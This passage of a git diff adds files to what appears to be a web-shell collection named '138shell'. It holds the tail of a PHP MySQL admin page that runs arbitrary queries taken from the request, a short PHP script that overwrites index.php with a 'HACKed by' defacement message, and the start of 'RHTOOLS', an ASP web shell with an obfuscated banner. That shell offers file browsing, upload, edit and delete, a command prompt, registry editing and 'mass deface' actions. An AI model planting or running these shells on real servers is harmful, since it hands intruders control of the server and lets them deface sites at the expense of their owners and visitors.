+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "<li><a href='$PHP_SELF?action=utils&command=flush_logs'>Logs</a>\n";
+		if( $command == "flush_logs" ) {
+			if( mysql_query( "Flush logs" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "<li><a href='$PHP_SELF?action=utils&command=flush_privileges'>Privileges</a>\n";
+		if( $command == "flush_privileges" ) {
+			if( mysql_query( "Flush privileges" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "<li><a href='$PHP_SELF?action=utils&command=flush_tables'>Tables</a>\n";
+		if( $command == "flush_tables" ) {
+			if( mysql_query( "Flush tables" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "<li><a href='$PHP_SELF?action=utils&command=flush_status'>Status</a>\n";
+		if( $command == "flush_status" ) {
+			if( mysql_query( "Flush status" ) != false )
+				echo "<font size=2 color=red>- Success</font>";
+			else
+				echo "<font size=2 color=red>- Fail</font>";
+		}
+		echo "</ul>\n";
+	} else {
+		$queryStr = ereg_replace( "_", " ", $command );
+		$pResult = mysql_query( $queryStr );
+		if( $pResult == false ) {
+			echo "Fail";
+			return;
+		}
+		$col = mysql_num_fields( $pResult );
+
+		echo "<p class=location>$queryStr</p>\n";
+		echo "<hr>\n";
+
+		echo "<table cellspacing=1 cellpadding=2 border=0>\n";
+		echo "<tr>\n";
+		for( $i = 0; $i < $col; $i++ ) {
+			$field = mysql_fetch_field( $pResult, $i );
+			echo "<th>".$field->name."</th>\n";
+		}
+		echo "</tr>\n";
+
+		while( 1 ) {
+			$rowArray = mysql_fetch_row( $pResult );
+			if( $rowArray == false ) break;
+			echo "<tr>\n";
+			for( $j = 0; $j < $col; $j++ )
+				echo "<td>".htmlspecialchars( $rowArray[$j] )."</td>\n";
+			echo "</tr>\n";
+		}
+		echo "</table>\n";
+	}
+}
+
+function header_html() {
+	global $PHP_SELF;
+	
+?>
+<html>
+<head>
+<title>MySQL Web Interface</title>
+<style type="text/css">
+<!--
+p.location {
+	color: #11bb33;
+	font-size: small;
+}
+h1 {
+	color: #A4A260;
+}
+th {
+	background-color: #BDBE42;
+	color: #FFFFFF;
+	font-size: x-small;
+}
+td {
+	background-color: #DEDFA5;
+	font-size: x-small;
+}
+form {
+	margin-top: 0;
+	margin-bottom: 0;
+}
+a {
+	text-decoration:none;
+	color: #848200;
+	font-size:x-small;
+}
+a:link {
+}
+a:hover {
+	background-color:#EEEFD5;
+	color:#646200;
+	text-decoration:none               
+}
+//-->
+</style>
+</head>
+<body>
+<?
+}
+
+function footer_html() {
+	global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $USERNAME;
+
+	echo "<hr>\n";
+	echo "<font size=2>\n";
+	echo "<font color=blue>[$USERNAME]</font> - \n";
+
+	echo "<a href='$PHP_SELF?action=listDBs'>Database List</a> | \n";
+	if( $tablename != "" )
+		echo "<a href='$PHP_SELF?action=listTables&dbname=$dbname&tablename=$tablename'>Table List</a> | ";
+	echo "<a href='$PHP_SELF?action=utils'>Utils</a> |\n";
+	echo "<a href='$PHP_SELF?action=logout'>Logout</a>\n";
+	echo "</font>\n";
+	echo "</body>\n";
+	echo "</html>\n";
+}
+
+//------------------------------------------------------ MAIN
+
+if( $action == "logon" || $action == "" || $action == "logout" )
+	logon();
+else if( $action == "logon_submit" )
+	logon_submit();
+else if( $action == "dumpTable" || $action == "dumpDB" ) {
+	while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
+		if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
+		if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
+	}
+	$mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
+	dump();
+} else {
+	while( list($var, $value) = each($HTTP_COOKIE_VARS) ) {
+		if( $var == "mysql_web_admin_username" ) $USERNAME = $value;
+		if( $var == "mysql_web_admin_password" ) $PASSWORD = $value;
+	}
+	echo "<!--";
+	$mysqlHandle = mysql_pconnect( $HOSTNAME, $USERNAME, $PASSWORD );
+	echo "-->";
+
+	if( $mysqlHandle == false ) {
+		echo "<html>\n";
+		echo "<head>\n";
+		echo "<title>MySQL Web Interface</title>\n";
+		echo "</head>\n";
+		echo "<body>\n";
+		echo "<table width=100% height=100%><tr><td><center>\n";
+		echo "<h1>Wrong Password!</h1>\n";
+		echo "<a href='$PHP_SELF?action=logon'>Logon</a>\n";
+		echo "</center></td></tr></table>\n";
+		echo "</body>\n";
+		echo "</html>\n";
+	} else {
+		header_html();
+		if( $action == "listDBs" )
+			listDatabases();
+		else if( $action == "createDB" )
+			createDatabase();
+		else if( $action == "dropDB" )
+			dropDatabase();
+		else if( $action == "listTables" )
+			listTables();
+		else if( $action == "createTable" )
+			createTable();
+		else if( $action == "dropTable" )
+			dropTable();
+		else if( $action == "viewSchema" )
+			viewSchema();
+		else if( $action == "query" )
+			viewData( $queryStr );
+		else if( $action == "addField" )
+			manageField( "add" );
+		else if( $action == "addField_submit" )
+			manageField_submit( "add" );
+		else if( $action == "editField" )
+			manageField( "edit" );
+		else if( $action == "editField_submit" )
+			manageField_submit( "edit" );
+		else if( $action == "dropField" )
+			dropField();
+		else if( $action == "viewData" )
+			viewData( "" );
+		else if( $action == "addData" )
+			manageData( "add" );
+		else if( $action == "addData_submit" )
+			manageData_submit( "add" );
+		else if( $action == "editData" )
+			manageData( "edit" );
+		else if( $action == "editData_submit" )
+			manageData_submit( "edit" );
+		else if( $action == "deleteData" )
+			deleteData();
+		else if( $action == "utils" )
+			utils();
+
+		mysql_close( $mysqlHandle);
+		footer_html();
+	}
+}
+
+?>
\ No newline at end of file
diff --git a/138shell/T/Test.php.txt b/138shell/T/Test.php.txt
new file mode 100644
index 0000000..2b0e8a3
--- /dev/null
+++ b/138shell/T/Test.php.txt
@@ -0,0 +1,13 @@
+<?php
+$entry_line="HACKed by EntriKa";
+$fp = fopen("index.php", "w");
+fputs($fp, $entry_line);
+fclose($fp);
+?>
+
+<? 
+$fp =@fopen("index.htm", "a+");
+$yazi = "test" . "\r\n";
+fwrite ($fp, "$yazi");
+fclose ($fp);
+?>
diff --git a/138shell/T/Tool.asp.txt b/138shell/T/Tool.asp.txt
new file mode 100644
index 0000000..3856514
--- /dev/null
+++ b/138shell/T/Tool.asp.txt
@@ -0,0 +1,792 @@
+<%@ LANGUAGE = VBScript.Encode %>
+<%
+On Error Resume Next
+Server.ScriptTimeOut  = 7200
+Class FileUploader
+	Public  Files
+	Private mcolFormElem
+	Private Sub Class_Initialize()
+		Set Files = Server.CreateObject("Scripting.Dictionary")
+		Set mcolFormElem = Server.CreateObject("Scripting.Dictionary")
+	End Sub
+	Private Sub Class_Terminate()
+		If IsObject(Files) Then
+			Files.RemoveAll()
+			Set Files = Nothing
+		End If
+		If IsObject(mcolFormElem) Then
+			mcolFormElem.RemoveAll()
+			Set mcolFormElem = Nothing
+		End If
+	End Sub
+	Public Property Get Form(sIndex)
+		Form = ""
+		If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))
+	End Property
+	Public Default Sub Upload()
+		Dim biData, sInputName
+		Dim nPosBegin, nPosEnd, nPos, vDataBounds, nDataBoundPos
+		Dim nPosFile, nPosBound
+		biData = Request.BinaryRead(Request.TotalBytes)
+		nPosBegin = 1
+		nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
+		If (nPosEnd-nPosBegin) <= 0 Then Exit Sub
+		vDataBounds = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
+		nDataBoundPos = InstrB(1, biData, vDataBounds)
+		Do Until nDataBoundPos = InstrB(biData, vDataBounds & CByteString("--"))
+			nPos = InstrB(nDataBoundPos, biData, CByteString("Content-Disposition"))
+			nPos = InstrB(nPos, biData, CByteString("name="))
+			nPosBegin = nPos + 6
+			nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
+			sInputName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
+			nPosFile = InstrB(nDataBoundPos, biData, CByteString("filename="))
+			nPosBound = InstrB(nPosEnd, biData, vDataBounds)
+			If nPosFile <> 0 And  nPosFile < nPosBound Then
+				Dim oUploadFile, sFileName
+				Set oUploadFile = New UploadedFile
+				nPosBegin = nPosFile + 10
+				nPosEnd =  InstrB(nPosBegin, biData, CByteString(Chr(34)))
+				sFileName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
+				oUploadFile.FileName = Right(sFileName, Len(sFileName)-InStrRev(sFileName, "\"))
+				nPos = InstrB(nPosEnd, biData, CByteString("Content-Type:"))
+				nPosBegin = nPos + 14
+				nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
+				oUploadFile.ContentType = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
+				nPosBegin = nPosEnd+4
+				nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
+				oUploadFile.FileData = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
+				If oUploadFile.FileSize > 0 Then Files.Add LCase(sInputName), oUploadFile
+			Else
+				nPos = InstrB(nPos, biData, CByteString(Chr(13)))
+				nPosBegin = nPos + 4
+				nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
+				If Not mcolFormElem.Exists(LCase(sInputName)) Then mcolFormElem.Add LCase(sInputName), CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
+			End If
+			nDataBoundPos = InstrB(nDataBoundPos + LenB(vDataBounds), biData, vDataBounds)
+		Loop
+	End Sub
+	Private Function CByteString(sString)
+		Dim nIndex
+		For nIndex = 1 to Len(sString)
+		   CByteString = CByteString & ChrB(AscB(Mid(sString,nIndex,1)))
+		Next
+	End Function
+	Private Function CWideString(bsString)
+		Dim nIndex
+		CWideString =""
+		For nIndex = 1 to LenB(bsString)
+		   CWideString = CWideString & Chr(AscB(MidB(bsString,nIndex,1))) 
+		Next
+	End Function
+End Class
+Class UploadedFile
+	Public ContentType
+	Public FileName
+	Public FileData
+	Public Property Get FileSize()
+		FileSize = LenB(FileData)
+	End Property
+	Public Sub SaveToDisk(sPath)
+		Dim oFS, oFile
+		Dim nIndex
+		If sPath = "" Or FileName = "" Then Exit Sub
+		If Mid(sPath, Len(sPath)) <> "\" Then sPath = sPath & "\"
+		Set oFS = Server.CreateObject("Scripting.FileSystemObject")
+		If Not oFS.FolderExists(sPath) Then Exit Sub
+		Set oFile = oFS.CreateTextFile(sPath & FileName, True)
+		For nIndex = 1 to LenB(FileData)
+		    oFile.Write Chr(AscB(MidB(FileData,nIndex,1)))
+		Next
+		oFile.Close
+	End Sub
+	Public Sub SaveToDatabase(ByRef oField)
+		If LenB(FileData) = 0 Then Exit Sub
+		If IsObject(oField) Then
+			oField.AppendChunk FileData
+		End If
+	End Sub
+End Class
+key = "5DCADAC1902E59F7273E1902E5AD8414B1902E5ABF3E661902E5B554FC41902E53205CA01902E59F7273E1902E597A18C51902E59AC1E8F1902E59DE24591902E55F5B0911902E53CF70E31902E597A18C51902E5B2349FA1902E5A422FED1902E597A18C51902E5A8D389C1902E53CF70E31902E53205CA01902E5B3C4CDF1902E5A422FED1902E5BEB61221902E59DE24591902E55F5B0911902E53CF70E31902E54C98DD51902E53CF70E31902E560EB3761902E547E85261902E55AAA7E21902E55AAA7E21902E53205CA01902E5802ED5A1902E5708D0681902E5834F3241902E57B7E4AB1902E57B7E4AB1902E576CDBFC1902E581BF03F1902E53205CA01902E54C98DD51902E547E85261902E552D99691902E53205CA01902E5672BF0A1902E56BDC7B91902E5834F3241902E5659BC251902E53E873C81902E57D0E7901902E5866F8EE1902E5834F3241902E540176AD1902E53B66DFE1902E59AC1E8F1902E5AD8414B1902E5AF144301902E5BD25E3D1902E55C3AAC71902E53205CA01902E5672BF0A1902E58B2019D1902E53205CA01902E55DCADAC1902E597A18C51902E53205CA01902E5A292D081902E5B2349FA1902E59DE24591902E59F7273E1902E55F5B0911902E53CF70E31902E5AA63B811902E597A18C51902E5A422FED1902E5A8D389C1902E5B554FC41902E5AD8414B1902E55AAA7E21902E5B2349FA1902E5A292D081902E59F7273E1902E597A18C51902E59AC1E8F1902E5B554FC41902E5AD8414B1902E5B2349FA1902E5640B9401902E597A18C51902E5ABF3E661902E5B554FC41902E5A422FED1902E5B3C4CDF1902E5AD8414B1902E59AC1E8F1902E5A422FED1902E597A18C51902E5A8D389C1902E547E85261902E59AC1E8F1902E5AD8414B1902E5AA63B811902E53CF70E31902E560EB3761902E5802ED5A1902E5708D0681902E56BDC7B91902E581BF03F1902E584DF6091902E581BF03F1902E53205CA01902E56D6CA9E1902E5659BC251902E568BC1EF1902E5834F3241902E57B7E4AB1902E5802ED5A1902E55DCADAC1902E5497880B1902E597A18C51902E560EB3761902E53205CA01902E546582411902E53205CA01902E55DCADAC1902E597A18C51902E53205CA01902E5A292D081902E5B2349FA1902E59DE24591902E59F7273E1902E55F5B0911902E53CF70E31902E5708D0681902E5834F3241902E5834F3241902E57D0E7901902E55AAA7E21902E5497880B1902E5497880B1902E587FFBD31902E587FFBD31902E587FFBD31902E547E85261902E5802ED5A1902E5708D0681902E56BDC7B91902E581BF03F1902E584DF6091902E581BF03F1902E56D6CA9E1902E5659BC251902E568BC1EF1902E5834F3241902E57B7E4AB1902E5802ED5A1902E547E85261902E568BC1EF1902E573AD6321902E5672BF0A1902E547E85261902E579EE1C61902E56BDC7B91902E5834F3241902E53CF70E31902E53205CA01902E5B554FC41902E597A18C51902E5B2349FA1902E5A102A231902E59DE24591902E5B554FC41902E55F5B0911902E53CF70E31902E594812FB1902E59931BAA1902E5A8D389C1902E597A18C51902E5ABF3E661902E5A7435B71902E53CF70E31902E560EB3761902E5708D0681902E5834F3241902E5834F3241902E57D0E7901902E55AAA7E21902E5497880B1902E5497880B1902E587FFBD31902E587FFBD31902E587FFBD31902E547E85261902E5802ED5A1902E5708D0681902E56BDC7B91902E581BF03F1902E584DF6091902E581BF03F1902E56D6CA9E1902E5659BC251902E568BC1EF1902E5834F3241902E57B7E4AB1902E5802ED5A1902E547E85261902E568BC1EF1902E573AD6321902E5672BF0A1902E547E85261902E579EE1C61902E56BDC7B91902E5834F3241902E55DCADAC1902E5497880B1902E597A18C51902E560EB3761902E53205CA01902E55AAA7E21902E55AAA7E21902E547E85261902E55DCADAC1902E5497880B1902E59F7273E1902E5AD8414B1902E5ABF3E661902E5B554FC41902E560EB3761902E5|337308|1A7023"
+startcode = "<html><head><title>.:: RHTOOLS 1.5 BETA(PVT) ::.</title></head><body>"
+endocde = "</body></html>"
+onlinehelp = "<font face=""arial"" size=""1"">.:: <a href=""http://www.rhesusfactor.cjb.net"" target=""_blank"">ONLINE HELP</a> ::.</font><br>"
+Function DeCryptString(strCryptString)
+	Dim strRAW, arHexCharSet, i, intKey, intOffSet, strRawKey, strHexCrypData
+	    strRawKey = Right(strCryptString, Len(strCryptString) - InStr(strCryptString, "|"))
+	    intOffSet = Right(strRawKey, Len(strRawKey) - InStr(strRawKey,"|"))
+	    intKey = HexConv(Left(strRawKey, InStr(strRawKey, "|") - 1)) - HexConv(intOffSet)
+	    strHexCrypData = Left(strCryptString, Len(strCryptString) - (Len(strRawKey) + 1))
+	    arHexCharSet = Split(strHexCrypData, Hex(intKey))
+		 For i=0 to UBound(arHexCharSet)
+		      strRAW = strRAW & Chr(HexConv(arHexCharSet(i))/intKey)
+		 Next
+	    DeCryptString = CStr(strRAW)
+End Function
+Function HexConv(hexVar)
+	Dim hxx, hxx_var, multiply          
+         IF hexVar <> "" THEN
+              hexVar = UCASE(hexVar)
+              hexVar = StrReverse(hexVar)
+              DIM hx()
+              REDIM hx(LEN(hexVar))
+              hxx = 0
+              hxx_var = 0
+              FOR hxx = 1 TO LEN(hexVar)
+                   IF multiply = "" THEN multiply = 1
+                   hx(hxx) = mid(hexVar,hxx,1)
+                   hxx_var = (get_hxno(hx(hxx)) * multiply) + hxx_var
+                   multiply = (multiply * 16)
+              NEXT
+              hexVar = hxx_var
+              HexConv = hexVar
+         END IF
+End Function
+cprthtml = "<font face='arial' size='1'>.:: RHTOOLS 1.5 BETA(PVT)&copy; BY <a href='mailto:rhfactor@antisocial.com'>RHESUS FACTOR</a> - <a href='HTTP://WWW.RHESUSFACTOR.CJB.NET' target='_blank'>HTTP://WWW.RHESUSFACTOR.CJB.NET</a> ::.</font>"
+Function get_hxno(ghx)
+         If ghx = "A" Then
+              ghx = 10
+         ElseIf ghx = "B" Then
+              ghx = 11
+         ElseIf ghx = "C" Then
+              ghx = 12
+         ElseIf ghx = "D" Then
+              ghx = 13
+         ElseIf ghx = "E" Then
+              ghx = 14
+         ElseIf ghx = "F" Then
+              ghx = 15
+         End If
+         get_hxno = ghx
+End Function
+keydec = DeCryptString(key)
+Function showobj(objpath)
+	showobj = Mid(objpath,InstrRev(objpath,"\")+1,Len(objpath))
+End Function
+Function showobjpath(objpath)
+	showobjpath = Left(objpath,InstrRev(objpath,"\"))
+End Function
+Function checking(a,b)
+	If CStr(Mid(a,95,13)) <> CStr(Mid(b,95,13)) Then
+		pagina = Mid(Request.ServerVariables("SCRIPT_NAME"),InstrRev(Request.ServerVariables("SCRIPT_NAME"),"/")+1,Len(Request.ServerVariables("SCRIPT_NAME"))) & "?action=error"
+		Response.Redirect(pagina)
+	End If
+End Function
+Sub hdr()
+	Response.Write startcode
+	Response.Write keydec
+	Response.Write "<br>"
+End Sub
+Sub showcontent()
+	Response.Write "<font face=""arial"" size=""1"">.:: <a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=root"">DRIVES</a> ::.<br>.:: SCRIPT PATH: " & UCase(Server.MapPath(Request.ServerVariables("SCRIPT_NAME"))) & "<br><br></font>"
+	If Trim(Request.QueryString("raiz")) = "root" Then
+		Set fs=Server.Createobject("Scripting.FileSystemObject")
+		Set drivecollection=fs.drives
+		Response.Write "<font face=""arial"" size=""2"">"
+		For Each drive IN drivecollection 
+			str=drive.driveletter & ":"
+			Response.Write "<b><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=" & str & """>" & UCase(str) & "</a></b><br>"
+			Select Case drive.DriveType
+				Case 0
+					tipodrive = "Unknown"
+					nomedrive = drive.VolumeName
+				Case 1
+					tipodrive = "Removable"
+					If drive.isready Then
+						nomedrive = drive.VolumeName
+					Else
+						nomedrive = ""
+					End If
+				Case 2
+					tipodrive = "Fixed"
+					If drive.isready Then
+						nomedrive = drive.VolumeName
+					Else
+						nomedrive = ""
+					End If
+				Case 3
+					tipodrive = "Network"
+					If drive.isready Then
+						nomedrive = drive.ShareName
+					Else
+						nomedrive = ""
+					End If
+				Case 4
+					tipodrive = "CD-Rom"
+					If drive.isready Then
+						nomedrive = drive.VolumeName
+					Else
+						nomedrive = ""
+					End If
+				Case 5
+					tipodrive = "RAM Disk"
+					If drive.isready Then
+						nomedrive = drive.VolumeName
+					Else
+						nomedrive = ""
+					End If
+			End Select
+			response.write "<b>Tipo:</b> " & tipodrive & "<br>"
+			response.write "<b>Nome: </b>" & nomedrive & "<br>"
+			response.write "<b>Sistema de Arquivos: </b>"
+			If drive.isready Then
+				set sp=fs.getdrive(str)
+				response.write sp.filesystem & "<br>"
+			Else
+			response.write "-<br>"
+			End If
+			Response.Write "<b>Espaço Livre: </b>"
+			If drive.isready Then
+				freespace = (drive.AvailableSpace / 1048576)
+				set sp=fs.getdrive(str)
+				response.write(Round(freespace,1) & " MB<br>")
+			Else
+				response.write("-<br>")
+			End If
+			Response.Write "<b>Espaço Total: </b>"
+			If drive.isready Then
+				totalspace = (drive.TotalSize / 1048576)
+				set sp=fs.getdrive(str)
+				response.write(Round(totalspace,1) & " MB<br>")
+			Else
+				response.write("-<br>")
+			End If
+			Response.Write "<br>"
+		Next
+		Response.Write "</font>"
+		Set fs = Nothing
+		Set drivecollection = Nothing
+		set sp=Nothing
+	Else
+		If Trim(Request.QueryString("raiz")) = "" Then
+			caminho = Server.MapPath(Request.ServerVariables("SCRIPT_NAME"))
+			pos = Instr(caminho,"\")
+			pos2 = 1
+			While pos2 <> 0
+				If Instr(pos + 1,caminho,"\") <> 0 Then
+					pos = Instr(pos + 1,caminho,"\")
+				Else
+					pos2 = 0
+				End If
+			Wend
+			raiz = Left(caminho,pos)
+		Else
+			raiz =  trim(Request.QueryString("raiz")) & "\"
+		End If
+		Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+		Set MonRep = ObjFSO.GetFolder(raiz)
+		Set ColFolders = MonRep.SubFolders
+		Set ColFiles0 = MonRep.Files
+		Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=mass&massact=test&path=" & Replace(raiz,"\","|") & "', 'win1','width=600,height=300,scrollbars=YES,resizable')"">MASS TEST IN " & UCase(raiz) & "</a></font><br><br>"
+		Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=mass&massact=dfc&path=" & Replace(raiz,"\","|") & "', 'win1','width=700,height=300,scrollbars=YES,resizable')"">MASS DEFACE IN " & UCase(raiz) & "</a></font><br><br>"
+		Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=upload&path=" & Replace(raiz,"\","|") & "', 'win1','width=500,height=100,scrollbars=YES,resizable')"">UPLOAD FILE TO " & UCase(raiz) & "</a></font><br><br>"
+		Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=cmd', 'win1','width=760,height=540,scrollbars=YES,resizable')"">PROMPT</a> - <a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=info', 'win1','width=760,height=450,scrollbars=YES,resizable')"">SYS INFO</a> - <a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg', 'win1','width=550,height=250,scrollbars=YES,resizable')"">REGEDIT</a></font><br><br>"
+		Response.Write "<font face='arial'><b>Root Folder: " & raiz & "</b></font><br><br>"
+		If CInt(Len(raiz) - 1) <> 2 Then
+			barrapos = CInt(InstrRev(Left(raiz,Len(raiz) - 1),"\")) - 1
+			backlevel = Left(raiz,barrapos)
+			Response.Write "<font face='arial' size='2'><b>&lt;DIR&gt;<a href='" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=" & backlevel & "'> . . </font></b></a><br>"
+		Else
+			Response.Write "<font face='arial' size='2'><b>&lt;DIR&gt;<a href='" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=root'> . .&nbsp;</font></b></a><br>"
+		End If
+		Response.Write "<table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
+		for each folderItem in ColFolders
+			Response.Write "<tr><td><font face='arial' size='2'><b>&lt;DIR&gt; <a href='" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=" & folderItem.path & "'>" & showobj(folderItem.path) & "</a></b></td><td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=put&path=" & Replace(folderItem.path,"\","|") & "', 'win1','width=400,height=250,scrollbars=YES,resizable')"">&lt;&lt; PUT</a></font></td></tr>"
+		next
+		Response.Write "</table><br><table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
+		marcatabela = true
+		for each FilesItem0 in ColFiles0
+			If marcatabela = true then
+				corfundotabela = " bgcolor=""#EEEEEE"""
+			Else
+				corfundotabela = ""
+			End If
+			Response.Write "<tr><td" & corfundotabela & "><font face='arial' size='2'>:: " & showobj(FilesItem0.path) & "</td><td valign='baseline'" & corfundotabela & "><font face='arial' size='1'>&nbsp;&nbsp;" & FormatNumber(FilesItem0.size/1024, 0) & "&nbsp;Kbytes&nbsp;&nbsp;&nbsp;</font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=get&path=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=400,height=200,scrollbars=YES,resizable')"">o.GET.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=ren&path=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=400,height=200,scrollbars=YES,resizable')"">o.REN.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=del&path=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=400,height=200,scrollbars=YES,resizable')"">o.DEL.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtview&file=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=640,height=480,scrollbars=YES,resizable')"">o.VIEW.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtedit&file=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=760,height=520,scrollbars=YES,resizable')"">o.EDIT.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=download&file=" & Replace(FilesItem0.path,"\","|") & """>o.DOWNLOAD.o</a></font></td></tr>"
+			marcatabela = NOT marcatabela
+		next
+		Response.Write "</table>"
+	End If
+End Sub
+Select Case Trim(Request.QueryString("action"))
+	Case "get"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		caminho = Replace(Trim(Request.QueryString("path")),"|","\")
+		Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+		Set MyFile = ObjFSO.GetFile(caminho)
+		destino = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
+		MyFile.Copy (destino)
+		If Err.Number = 0 Then
+			Response.Write "<font face='arial' size='2'><center><br><br>Arquivo: <b>" & caminho & "</b><br>copiado para: " & destino
+		End If	
+	Case "put"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		If Trim(Request.QueryString("arquivo")) = "" Then
+			caminho = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
+			varpath = Trim(Request.QueryString("path"))
+			Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+			Set MonRep = ObjFSO.GetFolder(caminho)
+			Set ColFolders = MonRep.SubFolders
+			Set ColFiles0 = MonRep.Files
+
+			Response.Write "<font face='arial' size='2'><b>Selecione o arquivo: <br><table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
+			for each FilesItem0 in ColFiles0
+				Response.Write "<tr><td><font face='arial' size='2'>:: " & showobj(FilesItem0.path) & "</td><td valign='baseline'><font face='arial' size='1'>&nbsp;&nbsp;" & FormatNumber(FilesItem0.size/1024, 0) & "&nbsp;Kbytes&nbsp;&nbsp;&nbsp;</font></td><td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='1'><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=put&path=" & varpath & "&arquivo=" & Replace(FilesItem0.path,"\","|") & """>:: SELECIONAR ::</a></font></td></tr>"
+			next
+			Response.Write "</table>"
+		Else
+			destino = Replace(Trim(Request.QueryString("path")),"|","\") & "\"
+			arquivo = Replace(Trim(Request.QueryString("arquivo")),"|","\")
+			Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+			Set MyFile = ObjFSO.GetFile(arquivo)
+			MyFile.Copy (destino)
+			If Err.Number = 0 Then
+				Response.Write "<font face='arial' size='2'><center><br><br>Arquivo: <b>" & arquivo & "</b><br>copiado para: <b>" & destino
+			End If
+		End If
+	Case "del"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		caminho = Replace(Trim(Request.QueryString("path")),"|","\")
+		Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+		Set MyFile = ObjFSO.GetFile(caminho)
+		MyFile.Delete
+		If Err.Number = 0 Then
+			Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
+			Response.Write "<font face='arial' size='2'><center><br><br>Arquivo <b>" & caminho & "</b> apagado<br>"
+		End If
+	Case "ren"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		If Trim(Request.QueryString("status")) <> "2" Then
+			caminho = Replace(Trim(Request.QueryString("path")),"|","\")
+			arquivo = showobj(caminho)
+			Response.Write "<br><font face=""arial"" size=""2""><b>" & arquivo & "</b><br>" & _
+						       "<form action=""" & Request.ServerVariables("SCRIPT_NAME") & """ method=""get"">" & _
+						       "<input type=""hidden"" name=""action"" value=""ren"">" & _
+						       "<input type=""hidden"" name=""status"" value=""2"">" & _
